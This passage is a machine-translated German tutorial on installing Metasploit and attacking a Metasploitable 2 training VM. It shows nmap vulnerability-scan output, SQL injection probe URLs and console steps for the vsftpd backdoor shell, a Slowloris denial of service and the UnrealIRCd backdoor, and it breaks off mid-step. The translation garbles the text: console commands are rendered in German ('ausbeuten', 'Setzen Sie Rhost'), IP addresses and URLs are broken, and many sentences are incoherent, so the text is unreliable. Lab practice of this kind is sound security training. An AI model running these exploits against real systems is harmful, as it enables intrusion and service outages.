Top 10 Metasploit -Verwendungsbeispiele

Top 10 Metasploit -Verwendungsbeispiele
Metasploit ist ein Sicherheitsrahmen, das viele Tools für Systemexploiten und Tests enthält. Dieses Tutorial zeigt 10 Beispiele für Hacking -Angriffe gegen ein Linux -Ziel. Das Linux -Ziel ist ein Trainingsumfeld Metasploitable 2 OS, das für Benutzer absichtlich gefährdet ist, wie sie seine Schwachstellen ausnutzen können. Dieses Tutorial konzentriert sich nur auf 10 spezifische Metasploit -Angriffe, um Informationen zu Metasploitable 2 Installation zu erhalten. Weitere Informationen finden Sie hier.Mit dem Download Metasploit mit dem Download.

In meinem Fall habe ich eine kostenlose Testversion von Metasploit Pro heruntergeladen, aber Sie können einen von ihnen erhalten.
Der folgende Bildschirm erfordert einige Ihrer persönlichen Daten, um sie an die Download -Seite zu übergeben:

Laden Sie Metasploit für Linux herunter:

Geben Sie dem Installationsprogramm, das Sie gerade ausgeführt haben, durch Ausführen:

# Chmod +x metasploit-latest-linux-X64-Installation.laufen

Führen Sie dann Metasploit aus, indem Sie ausführen:

# ./metasploit-latest-linux-X64-Installer.laufen

Klicken Sie auf Eingabeaufforderungen an die Installationsprogramme, wenn Sie eine Installationsprodukte anzeigen, auf Nach vorne weitermachen:

Akzeptieren Sie im nächsten Bildschirm die Lizenzvereinbarung und klicken Sie auf Nach vorne:

Lassen Sie das Standardverzeichnis und drücken Sie Nach vorne:

Auf die Frage, ob Metasploit als Service installiert werden soll Die Empfehlung ist nicht, wenn Sie dies tun, startet der Metasploit -Service jedes Mal, wenn Sie starten, wenn Sie drücken, wenn Sie drücken NEIN Der Metasploit -Service wird nur auf Ihre Anfrage gestartet. Wählen Sie Ihre Auswahl aus und drücken Sie vorwärts, um fortzufahren:

Um Störungen zu vermeiden, drücken Sie bei der Verwendung von Metasploit Ihre Firewall Nach vorne weitermachen:

Sofern der angezeigte Port bereits verwendet wird, drücken Sie Nach vorne weitermachen:

Lass localhost und drücken Sie Nach vorne weitermachen:

Dann mit der Installationspresse fortfahren Nach vorne zum letzten Mal:

Der Installationsprozess beginnt:

Schließlich wurde Metasploit installiert, obwohl wir nicht mit der Metasploit -Weboberfläche zusammenarbeiten werden, können Sie sie markieren, um sie verfügbar zu halten. Drücken Sie Beenden beenden.

Fehlerbehebung mit Metasploit -DB -Fehler:

In meinem Fall, als ich Metasploit startete, gab es den Fehler zurück:

 Keine Datenbankunterstützung: Kann keine Verbindung zum Server herstellen: Die Verbindung verweigert ist der Server, der auf dem Host "Localhost" (:: 1) ausgeführt wird und TCP/IP -Verbindungen auf Port 7337 akzeptiert? 

Der Grund für diesen Fehler ist, dass die Abhängigkeit PostgreSQL nicht installiert wurde, und der Metasploit -Service auch nicht.

Um es zu lösen, läuft:

# APT Install -y postgresql

Starten Sie dann Postgresql, indem Sie ausführen:

# sudo service postgresql start

Und schließlich den Metasploit -Service starten:

# sudo service Metasploit Start

Jetzt rennen MSFConsole Wieder und Sie werden bemerken, dass der Fehler verschwunden ist und wir sind bereit, Metasploitable 2:

Verwenden von Metasploit zum Scannen eines Ziels nach Sicherheitslücken:

Der erste Schritt besteht darin, unser Ziel zu scannen, um Dienste und Schwachstellen darauf zu entdecken. Um dies zu erreichen, verwenden wir NMAP von Metasploit und seinem NSE (NMAP Scripting Engine) Vuln -Skript, das zur Erkennung von Schwachstellen verwendet wird:

# db_nmap -v --Skript vuln 192.168.0.184

NOTIZ: ersetzen 192.168.0.184 Für Ihre Ziel -IP -Adresse oder Ihr Host.

Lassen Sie uns die Ausgabe von NMAP analysieren:

WICHTIG: Die NMAP -Ausgabe enthielt über 4000 Zeilen.

Die folgenden Zeilen zeigen uns nur die initialisierten Scans -Arten, die NSE, ARP -Ping -Scan, DNS -Auflösung und einen Syn -Stealth -Scan umfassen. Alle diese Schritte wurden bereits unter LinuxHint klar erklärt.COM bei NPing- und NMAP -ARP -Scan mit NMAP -Skripten und NMAP Stealth Scan.

Beachte.

 msf5> db_nmap -v --Script vuln 192.168.0.184 [*] NMAP: NMAP Starten Sie 7.70 (https: // nmap.org) um 2020-02-04 16:56 -03 [*] NMAP: NSE: geladen 103 Skripte zum Scannen. [*] NMAP: NSE: Skript vor dem Scannen. [*] NMAP: Initiieren von NSE um 16:56 [*] NMAP: NSE um 16:57, 10 abgeschlossen.00SS verstrichen [*] NMAP: Initiieren von NSE um 16:57 [*] NMAP: Abgeschlossene NSE um 16:57, 0.00SS verstrichen [*] NMAP: Initiieren von ARP Ping -Scan um 16:57 [*] NMAP: Scannen 192.168.0.184 [1 Port] [*] NMAP: Abgeschlossener ARP -Ping -Scan um 16:57, 0.05S verstrichen (1 Gesamthost) [*] NMAP: Initiieren der parallelen DNS -Auflösung von 1 Host. um 16:57 [*] NMAP: Abgeschlossene parallele DNS -Auflösung von 1 Host abgeschlossen. um 16:57, 0.02s verstrichen [*] NMAP: Initiieren von Syn Stealth Scan um 16:57 [*] NMAP: Scaning 192.168.0.184 [1000 Ports] 

Der nächste Auszug zeigt, welche Dienste bei unserem Ziel verfügbar sind:

 [*] NMAP: Open Port 25/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 80/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 445/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 139/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 3306/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 5900/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 22/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 53/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 111/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 21/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 23/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 1099/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 512/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 1524/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 513/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 514/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 2121/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 6000/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 2049/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 6667/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 8009/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 5432/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Open Port 8180/TCP auf 192 entdeckt.168.0.184 [*] NMAP: Abgeschlossener Syn -Stealth -Scan um 16:57, 0.12s verstrichen (1000 Gesamtanschlüsse) 

Der folgende Extrakt -Bericht NSE -Post -Scan -Skripte Ausführung, um Schwachstellen zu finden:

 [*] NMAP: NSE: Skript Scannen 192.168.0.184. [*] NMAP: Initiieren von NSE um 16:57 [*] NMAP: Abgeschlossene NSE um 17:02, 322.44S verstrichen [*] NMAP: Initiieren von NSE um 17:02 [*] NMAP: Abgeschlossene NSE um 17:02, 0.74S verstrichen [*] NMAP: NMAP -Scan -Bericht für 192.168.0.184 [*] NMAP: Der Host ist auf (0).00075s Latenz). [*] NMAP: Nicht gezeigt: 977 geschlossene Ports 

Wie Sie sehen können, hat NMAP bereits Sicherheitslöcher oder Schwachstellen im Ziel -FTP -Dienst gefunden. Es wird sogar mit dem Ziel verknüpft, das Ziel zu hacken:

 [*] NMAP: Port State Service [*] NMAP: 21/TCP Open FTP [*] NMAP: | ftp-vsftpd-backdoor: [*] nmap: | Verletzlich: [*] NMAP: | vsftpd Version 2.3.4 Backdoor [*] NMAP: | Staat: verletzlich (ausborralbar) [*] NMAP: | IDS: OSVDB: 73573 CVE: CVE-2011-2523 [*] NMAP: | vsftpd Version 2.3.4 Hintertür, dies wurde am 07.07.2011 gemeldet. [*] NMAP: | Offenlegungsdatum: 2011-07-03 [*] NMAP: | Exploit -Ergebnisse: [*] NMAP: | Shell -Befehl: ID [*] NMAP: | Ergebnisse: uid = 0 (root) gid = 0 (root) [*] nmap: | Referenzen: [*] NMAP: | http: // scarybeastsecurity.Blogspot.com/2011/07/alert-vsftpd-download-backdoored.HTML [*] NMAP: | http: // osvdb.org/73573 [*] nmap: | https: // github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb [*] nmap: | _ https: // cve.Gehrung.org/cgi-bin/cvename.CGI?Name = CVE-2011-2523 

Im Folgenden finden Sie zusätzlich zu FTP -Sicherheitslöchern NMAP SSL -Schwachstellen:

[*] NMAP: | _SSLV2-DROW: [*] NMAP: 22/TCP Open SSH [*] nmap: 23/tcp öffnen telnet [*] nmap: 25/tcp öffnen SMTP [*] nmap: | SMTP-VULN-CVE2010-4344: [*] NMAP: | _ Der SMTP-Server ist nicht exim: nicht verletzlich [*] nmap: | SSL-DH-Params: [*] NMAP: | Verletzlich: [*] NMAP: | Anonymous Diffie-Hellman Key Exchange MITM-Verwundbarkeit [*] NMAP: | Zustand: verletzlich [*] NMAP: | TLS -Dienste (Transport Layer Security), die anonyme [*] NMAP verwenden: | Diffie-Hellman Key Exchange bietet nur Schutz vor Passiv [*] NMAP: | Lauschen und sind anfällig für aktive Mann-in-the-Middle-Angriffe [*] NMAP: | Dies könnte die Vertraulichkeit und Integrität [*] nmap vollständig beeinträchtigen: | von Daten, die über die resultierende Sitzung ausgetauscht wurden. [*] NMAP: | Ergebnisse überprüfen: [*] NMAP: | Anonyme DH -Gruppe 1 [*] NMAP: | CIPHER SUITE: TLS_DH_ANON_WITH_AES_256_CBC_SHA [*] NMAP: | Modultyp: Safe Prime [*] NMAP: | Modulquelle: Postfix integriert [*] NMAP: | Modullänge: 1024 [*] NMAP: | Generatorlänge: 8 [*] NMAP: | Öffentliche Schlüssellänge: 1024 [*] NMAP: | Referenzen: [*] NMAP: | https: // www.ietf.org/rfc/rfc2246.txt [*] nmap: | [*] NMAP: | TLS -Protokoll für Transportschicht (TLS) DHE_EXPORT CIPHERS DUFGRADE MITM (LOGJAM) [*] NMAP: | Zustand: verletzlich [*] NMAP: | IDS: OSVDB: 122331 CVE: CVE-2015-4000 [*] NMAP: | Das TLS -Protokoll (Transport Layer Security) enthält einen Fehler, der [*] nmap ist: | Ausgelöst beim Umgang mit Diffie-Hellman-Schlüsselbörsen definiert mit [*] NMAP: | die dhe_export cipher. Dies kann einen Mann-in-the-Middle-Angreifer [*] NMAP ermöglichen: | Um die Sicherheit einer TLS-Sitzung auf 512-Bit-Exportgrade [*] NMAP herabzustufen: | Kryptographie, die signifikant schwächer ist und dem Angreifer [*] NMAP ermöglicht: | So leichter die Verschlüsselung und die Überwachung oder die manipulationsansiedlung mit [*] NMAP zu brechen: | der verschlüsselte Strom. [*] NMAP: | Offenlegungsdatum: 2015-5-19 [*] NMAP: | Ergebnisse überprüfen: [*] NMAP: | Export-Grad-DH-Gruppe 1 [*] NMAP: | CIPHER SUITE: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA [*] NMAP: | Modultyp: Safe Prime [*] NMAP: | Modulquelle: Unbekannte/benutzerdefinierte Erzeuger [*] NMAP: | Modullänge: 512 [*] NMAP: | Generatorlänge: 8 [*] NMAP: | Öffentliche Schlüssellänge: 512 [*] NMAP: | Referenzen: [*] NMAP: | https: // wecdh.org [*] nmap: | http: // osvdb.org/122331 [*] nmap: | https: // cve.Gehrung.org/cgi-bin/cvename.CGI?Name = CVE-2015-4000 [*] NMAP: | [*] NMAP: | Diffie-Hellman Key Exchange Unzureichende Gruppenstärke [*] NMAP: | Zustand: verletzlich [*] NMAP: | TLS-Dienste (Transport Layer Security), die Diffie-Hellman-Gruppen verwenden [*] NMAP: | von unzureichender Stärke, insbesondere solche, die eines von wenigen häufig verwenden [*] nmap: | Gemeinsame Gruppen können anfällig für passive Abhändungsangriffe sein. [*] NMAP: | Ergebnisse überprüfen: [*] NMAP: | Schwache DH -Gruppe 1 [*] NMAP: | CIPHER SUITE: TLS_DHE_RSA_WITH_DES_CBC_SHA [*] NMAP: | Modultyp: Safe Prime [*] NMAP: | Modulquelle: Postfix integriert [*] NMAP: | Modullänge: 1024 [*] NMAP: | Generatorlänge: 8 [*] NMAP: | Öffentliche Schlüssellänge: 1024 [*] NMAP: | Referenzen: [*] nmap: | _ https: // wecdh.org [*] nmap: | SSL-Pudel: [*] NMAP: | Verletzlich: [*] NMAP: | SSL Pudel Information Leck [*] NMAP: | Zustand: verletzlich [*] NMAP: | IDs: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | Das SSL -Protokoll 3.0, wie in OpenSSL durch 1 verwendet.0.1i und andere [*] nmap: | Produkte, verwendet nichtdeterministische CBC -Polsterung, was es einfacher macht [*] nmap: | Für Man-in-the-Middle-Angreifer, um ClearText-Daten über ein [*] NMAP zu erhalten: | Padding-Oracle-Angriff, auch bekannt als "Pudel" -Problem. [*] NMAP: | Offenlegungsdatum: 2014-10-14 [*] NMAP: | Ergebnisse überprüfen: [*] NMAP: | Tls_rsa_with_aes_128_cbc_sha [*] nmap: | Referenzen: [*] NMAP: | https: // cve.Gehrung.org/cgi-bin/cvename.CGI?Name = CVE-2014-3566 [*] NMAP: | https: // www.OpenSSL.org/~ bodo/ssl-pudel.PDF [*] NMAP: | https: // www.Imperialviolett.org/2014/10/14/pudel.html [*] nmap: | _ http: // osvdb.org/113251 [*] nmap: | SSLV2-DROW: [*] NMAP: | Chiffren: [*] NMAP: | Ssl2_rc4_128_export40_with_md5 [*] nmap: | Ssl2_des_192_ede3_cbc_with_md5 [*] nmap: | Ssl2_rc2_128_cbc_with_md5 [*] nmap: | Ssl2_rc2_128_cbc_export40_with_md5 [*] nmap: | Ssl2_rc4_128_with_md5 [*] nmap: | Ssl2_des_64_cbc_with_md5 [*] nmap: | Vulns: [*] NMAP: | CVE-2016-0703: [*] NMAP: | Titel: OpenSSL: Divide-and-Conquer Session Key Recovery in SSLV2 [*] NMAP: | Zustand: verletzlich [*] NMAP: | IDs: [*] NMAP: | CVE: CVE-2016-0703 [*] NMAP: | Beschreibung: [*] NMAP: | Die Funktion get_client_master_key in S2_SRVR.C In der SSLV2 -Implementierung in [*] NMAP: | OpenSSL vor 0.9.8zf, 1.0.0 vor 1.0.0r, 1.0.1 vor 1.0.1m und 1.0.2 vor [*] nmap: | 1.0.2a akzeptiert einen lagern-master-Key-Längenwert für einen willkürlichen [*] NMAP: | Cipher, mit der Angreifer von Menschen in den Mitte den Master-Key-Wert [*] NMAP bestimmen können: | und entschlüsseln TLS -Chiffretextdaten, indem Sie ein Bleichenbacher RSA -Polster -Orakel nutzen, ein [*] NMAP: | Verwandte Problem mit CVE-2016-0800. [*] NMAP: | [*] NMAP: | Refs: [*] NMAP: | https: // cve.Gehrung.org/cgi-bin/cvename.CGI?Name = CVE-2016-0703 [*] NMAP: | https: // www.OpenSSL.org/news/secadv/20160301.txt 

Der folgende Extrakt zeigt viele Schwachstellen im Webserver, einschließlich Zugriff auf vernünftige Anmeldeseiten und Verweigerung von Service -Schwachstellen.

 [*] NMAP: 53/TCP Offene Domäne [*] NMAP: 80/TCP Open HTTP [*] NMAP: | http-csrf: [*] nmap: | Spidering beschränkt auf: maxdepth = 3; maxpageCount = 20; innerhalb von Host = 192.168.0.184 [*] NMAP: | Fanden die folgenden möglichen CSRF -Schwachstellen: [*] NMAP: | [*] NMAP: | Pfad: http: // 192.168.0.184: 80/ dvwa/ [*] nmap: | Form ID: [*] NMAP: | Formataktion: Anmeldung.PHP [*] NMAP: | [*] NMAP: | Pfad: http: // 192.168.0.184: 80/DVWA/Login.PHP [*] NMAP: | Formular -ID: [*] NMAP: | _ Formion Aktion: Anmeldung.PHP [*] NMAP: | _http-dombased-XSS: Es konnte keine DOM-basierten XSS finden. [*] NMAP: | http-enum: [*] nmap: | /tikiwiki/: tikiwiki [*] nmap: | /Test/: Testseite [*] NMAP: | /phpinfo.PHP: Mögliche Informationsdatei [*] NMAP: | /phpmyadmin/: phpmyadmin [*] nmap: | /doc/: potenziell interessantes Verzeichnis mit Auflistung auf 'Apache/2.2.8 (Ubuntu) DAV/2 '[*] NMAP: | /icons/: Potenziell interessanter Ordner mit Verzeichnisliste [*] NMAP: | _/index/: potenziell interessanter Ordner [*] NMAP: | http-Slowloris-Check: [*] NMAP: | Verletzlich: [*] NMAP: | Slowloris dos Angriff [*] NMAP: | Zustand: Wahrscheinlich verletzlich [*] NMAP: | IDS: CVE: CVE-2007-6750 [*] NMAP: | Slowloris versucht, viele Verbindungen zum Ziel -Webserver zu halten und [*] NMAP zu halten: | sie öffnen sich so lange wie möglich. Es führt dies durch Öffnen von Verbindungen zu [*] NMAP: | Der Ziel -Webserver und das Senden einer Teilanforderung. Auf diese Weise verhungert es [*] nmap: | Die Ressourcen des HTTP -Servers, die eine Denial -of -Service -Verweigerung verursachen. [*] NMAP: | [*] NMAP: | Offenlegungsdatum: 2009-09-17 [*] NMAP: | Referenzen: [*] NMAP: | http: // ha.CKERS.org/Slowloris/[*] nmap: | _ https: // cve.Gehrung.org/cgi-bin/cvename.CGI?Name = CVE-2007-6750 

In dieser Stufe fand NMAP viele Schwachstellen für SQL -Injektionen, die Menge der Schwachstellen war für dieses Tutorial so groß, dass ich viele von ihnen entfernt habe und einige hinterließ:

 [*] NMAP: | HTTP-SQL-Injektion: [*] NMAP: | Möglicherweise SQLI für Abfragen: [*] NMAP: | http: // 192.168.0.184: 80/Dav/?C = n%3BO%3DD%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Dav/?C = S%3BO%3DA%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Dav/?C = M%3BO%3DA%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Dav/?C = D%3BO%3DA%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/Index.Php?Page = Pen-Test-Tool-Lookup.PHP%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/Index.Php?Seite = Dokumentation%2Fvulnerabilities.PHP%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/Index.Php?Seite = Capture-Data.PHP%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/Index.Php?Page = Text-Datei-Viewer.PHP%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/?Seite = add-to-your-blog.PHP%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/?Seite = Show-Log.PHP%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/Index.Php?Seite = Register.PHP%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/Index.Php?Seite = HTML5-Storage.PHP%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/Index.Php?Seite = Benutzer-Info.PHP%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/Index.Php?Seite = Zuhause.PHP & do = Toggle-Hints%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/Index.Php?Seite = Show-Log.PHP%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/Index.Php?Seite = Notizen.PHP%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/Index.Php?Seite = Framing.PHP%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/Index.Php?Seite = Php-Fehler.PHP%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/Index.Php?Seite = Zuhause.PHP & do = Toggle-Security%27%20OR%20SQLSPIDER 

Nachfolgend wirft NMAP XSS -Schwachstellen erneut ab (wie im ersten Auszug) und berichtet

RMI -Sicherheitslöcher (Remote Method Invocation (RMI) Fälligkeit falscher Konfiguration, sodass ein Angreifer eine böswillige Java -Codeausführung ermöglicht:

 [*] NMAP: | _http-Stored-XSS: Es konnte keine gespeicherten XSS-Schwachstellen finden. [*] NMAP: | _http-Trace: Trace ist aktiviert [*] nmap: | _http-vuln-cve2017-1001000: Fehler: Skriptausführung fehlgeschlagen (Verwendung -d-Debug) [*] nmap: 111/tcp öffnen rpcbind öffnen rpcbind [ *] NMAP: 139/TCP Open NetBios-SSN [*] NMAP: 445/TCP Open Microsoft-Ds [*] NMAP: 512/TCP Open Exec [*] NMAP: 513/TCP Open Login [*] NMAP: 514/514/ TCP Open Shell [*] NMAP: 1099/TCP Open rmiregistry [*] NMAP: | RMI-VULN-KlasseLader: [*] NMAP: | Verletzlich: [*] NMAP: | RMI -Registrierung Standardkonfiguration Remote -Code -Ausführung Sicherheitsanfälligkeit [*] NMAP: | Zustand: verletzlich [*] NMAP: | Die Standardkonfiguration der RMI -Registrierung ermöglicht das Laden von Klassen von Remote -URLs, die zur Ausführung von Remote -Code führen können. [*] NMAP: | [*] NMAP: | Referenzen: [*] nmap: | _ https: // github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb 

Im Folgenden finden Sie weitere SSL -Schwachstellen, die gefunden wurden:

 [*] NMAP: | SSL-CCS-Injektion: [*] NMAP: | Verletzlich: [*] NMAP: | SSL/TLS MITM -Sicherheitsanfälligkeit (CCS -Injektion) [*] NMAP: | Zustand: verletzlich [*] NMAP: | Risikofaktor: Hoch [*] NMAP: | OpenSSL vor 0.9.8za, 1.0.0 vor 1.0.0m und 1.0.1 vor 1.0.1H [*] NMAP: | schränkt nicht ordnungsgemäß die Verarbeitung von Meldungen von änderungen, [*] NMAP: | Dies ermöglicht es, Angreifer von Menschen in den Mitte zu verwenden, um die Verwendung eines Null [*] nmap auszulösen: | Länge Hauptschlüssel in bestimmten OpenSSL-to-OpenSSL-Kommunikation und [*] NMAP: | Folglich hijack -Sitzungen oder erhalten sensible Informationen über [*] NMAP: | Ein gefertigter TLS -Handschlag, auch bekannt als "CCS -Injektion" -Anfälligkeit. [*] NMAP: | [*] NMAP: | Referenzen: [*] NMAP: | https: // cve.Gehrung.org/cgi-bin/cvename.CGI?Name = CVE-2014-0224 [*] NMAP: | http: // www.Cvedetails.com/cve/2014-0224 [*] nmap: | _ http: // www.OpenSSL.org/news/secadv_20140605.txt [*] nmap: | SSL-DH-Params: [*] NMAP: | Verletzlich: [*] NMAP: | Diffie-Hellman Key Exchange Unzureichende Gruppenstärke [*] NMAP: | Zustand: verletzlich [*] NMAP: | TLS-Dienste (Transport Layer Security), die Diffie-Hellman-Gruppen verwenden [*] NMAP: | von unzureichender Stärke, insbesondere solche, die eines von wenigen häufig verwenden [*] nmap: | Gemeinsame Gruppen können anfällig für passive Abhändungsangriffe sein. [*] NMAP: | Ergebnisse überprüfen: [*] NMAP: | Schwache DH -Gruppe 1 [*] NMAP: | CIPHER SUITE: TLS_DHE_RSA_WITH_AES_128_CBC_SHA [*] NMAP: | Modultyp: Safe Prime [*] NMAP: | Modulquelle: Unbekannte/benutzerdefinierte Erzeuger [*] NMAP: | Modullänge: 1024 [*] NMAP: | Generatorlänge: 8 [*] NMAP: | Öffentliche Schlüssellänge: 1024 [*] NMAP: | Referenzen: [*] nmap: | _ https: // wecdh.org [*] nmap: | SSL-Pudel: [*] NMAP: | Verletzlich: [*] NMAP: | SSL Pudel Information Leck [*] NMAP: | Zustand: verletzlich [*] NMAP: | IDs: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | Das SSL -Protokoll 3.0, wie in OpenSSL durch 1 verwendet.0.1i und andere 

Der nächste Auszug zeigt, dass unser Ziel möglicherweise mit einem Trojaner gegen einen IRC -Dienst infiziert ist:

 [*] NMAP: | _irc-unrealircd-backdoor: Sieht aus wie eine trojanierte Version von Unrealircd. Siehe http: // Seclists.org/fulldisclosure/2010/Jun/277 [*] NMAP: 8009/TCP Open AJP13 

Der folgende Extrakt zeigt, dass das HTTPonly-Flag nicht ordnungsgemäß konfiguriert ist. Daher ist das Ziel anfällig für Skriptangriffe von Cross-Site:

 [*] NMAP: 8180/TCP Open Unbekannt [*] NMAP: | Http-Cookie-Flags: [*] NMAP: | /admin/: [*] nmap: | JSESSIONID: [*] NMAP: | Httponly Flag nicht gesetzt [*] NMAP: | /Admin/Index.HTML: [*] NMAP: | JSESSIONID: [*] NMAP: | Httponly Flag nicht gesetzt [*] NMAP: | /Admin Login.HTML: [*] NMAP: | JSESSIONID: [*] NMAP: | Httponly Flag nicht gesetzt [*] NMAP: | /admin/admin.HTML: [*] NMAP: | JSESSIONID: [*] NMAP: | Httponly Flag nicht gesetzt [*] NMAP: | /admin/Konto.HTML: [*] NMAP: | JSESSIONID: [*] NMAP: | Httponly Flag nicht gesetzt [*] NMAP: | /admin/admin_login.HTML: [*] NMAP: | JSESSIONID: [*] NMAP: | Httponly Flag nicht gesetzt [*] NMAP: | /admin/home.HTML: 

Der folgende Extrakt wird aufgezählt oder listet interessante zugängliche Verzeichnisse auf unserem Ziel auf:

 [*] NMAP: | http-enum: [*] nmap: | /admin/: Möglicher Administratorordner [*] NMAP: | /Admin/Index.HTML: Möglicher Administratorordner [*] NMAP: | /Admin Login.HTML: Möglicher Administratorordner [*] NMAP: | /admin/admin.HTML: Möglicher Administratorordner [*] NMAP: | /admin/Konto.HTML: Möglicher Administratorordner [*] NMAP: | /admin/admin_login.HTML: Möglicher Administratorordner [*] NMAP: | /admin/home.HTML: Möglicher Administratorordner [*] NMAP: | /Admin/Admin-Login.HTML: Möglicher Administratorordner [*] NMAP: | /admin/adminlogin.HTML: Möglicher Administratorordner [*] NMAP: | /admin/controlpanel.HTML: Möglicher Administratorordner [*] NMAP: | /admin/cp.HTML: Möglicher Administratorordner [*] NMAP: | /Admin/Index.JSP: Möglicher Administratorordner 

Schließlich endet der Scan und die Post-Scaning-NSE wird ausgeführt:

 [*] NMAP: | [*] NMAP: | Offenlegungsdatum: 2009-09-17 [*] NMAP: | Referenzen: [*] NMAP: | http: // ha.CKERS.org/Slowloris/[*] nmap: | _ https: // cve.Gehrung.org/cgi-bin/cvename.CGI?Name = CVE-2007-6750 [*] NMAP: MAC-Adresse: 08: 00: 27: DD: 87: 8C (Oracle VirtualBox Virtual Nic) [*] NMAP: Host-Skript Ergebnisse: [*] nmap: | _smb-vuln -MS10-054: Falsch [*] nmap: | _smb-vuln-ms10-061: false [*] nmap: nse: script post-scanning. [*] NMAP: Initiieren von NSE um 17:02 [*] NMAP: Abgeschlossene NSE um 17:02, 0, 0.00SS verstrichen [*] NMAP: Initiieren von NSE um 17:02 [*] NMAP: Abgeschlossene NSE um 17:02 Uhr, 0.00S verstrichen [*] NMAP: Lesen Sie Datendateien aus:/opt/metasploit/Common/Share/NMAP/[*] NMAP: NMAP DEFAKTIERT: 1 IP -Adresse (1 Host Up) gescannt in 333.96 Sekunden [*] NMAP: RAW -Pakete gesendet: 1001 (44.028KB) | RCVD: 1001 (40.120 KB) MSF5> 

Jetzt haben wir einige Sicherheitslöcher identifiziert, um unser Ziel anzugreifen.

Verwenden von Metasploit zum Hacken eines FTP -Servers:

Sobald Sie Sicherheitslöcher in Ihrem Ziel identifiziert haben. Wie Sie zuvor gesehen haben, war eine der ersten gefundenen Schwachstellen auf dem VSFTPD -Server, um ordnungsgemäße Exploits im Metasploit -Lauf zu finden:

# Suche vsftpd

Wie Sie sehen, enthält Metasploit eine Hintertür, die uns möglicherweise helfen kann, unser Ziel -FTP zu hacken. Um diesen Exploit in Metasploit -Lauf zu verwenden:

# Verwenden Sie exploit/unix/ftp/vsftpd_234_backdoor

Um zu erfahren, wie Sie einen bestimmten Exploit -Lauf verwenden:

# Optionen anzeigen

Wie Sie oben sehen. Wir müssen den Rhost angeben, der Port ist bereits angegeben (21).
So setzen Sie den Remote -Host (Rhost), der den Ziel -IP -Lauf definiert:

# Setzen Sie Rhost 192.168.0.184

Sobald das Ziel definiert ist, führen Sie den folgenden Befehl aus, um das Sicherheitsloch auszunutzen:

# ausbeuten

Wie Sie sehen konnten, habe ich beim Ausführen von „LS“ eine Shell in das Ziel bekommen, die ich die Zieldateien sehen kann, der Angriff gelangte. Um das Ziel zu verlassen, rennen Sie einfach:

#Ausfahrt

Verwenden von Metasploit für den DOS -Angriff:

Wie Sie während des Scanprozesses gesehen haben, wurde eine DOS -Slowloris -Sicherheitsanfälligkeit gefunden, um zu finden, wie sie ausnutzen können, um die vorherigen Schritte zu befolgen, um nach einem geeigneten Tool zu suchen, in diesem Fall ein Hilfsmodul anstelle eines Exploits:

# Slowloris suchen

Sobald wir ein Werkzeug gefunden haben, um anzugreifen, rennen Sie:

# Verwenden Sie Hilfs-/dos/http/Slowloris
# Setzen Sie Rhost 192.168.0.184

Dann tippen Sie einfach:

# laufen

Sie werden feststellen, dass der Angriff ausgeführt wird, der Ziel -HTTP -Dienst nicht verfügbar ist. Er wird weiter geladen:

Sobald wir den Angriff durch Drücken stoppen Strg+C Der Server wird erneut verfügbar sein:

Verwenden von Metasploit zum Hacken eines IRC -Servers:

Der Internet -Relais -Chat wird weltweit weit verbreitet, wie Sie in den ersten Phasen des Scan -Metasploits möglicherweise einen IRC (Unreal IRCD) -Dienst mit einem Trojaner infiziert haben können.

Wiederholen wir die Schritte, um ein Werkzeug zu finden, um es zu hacken:

# Suchen Sie unwirkliche IRCD
# Verwenden Sie exploit/unix/irc/unreal_ircd_3281_backdoor
# Optionen anzeigen
# Setzen Sie Rhost 192.168.0.184

Dann renne:
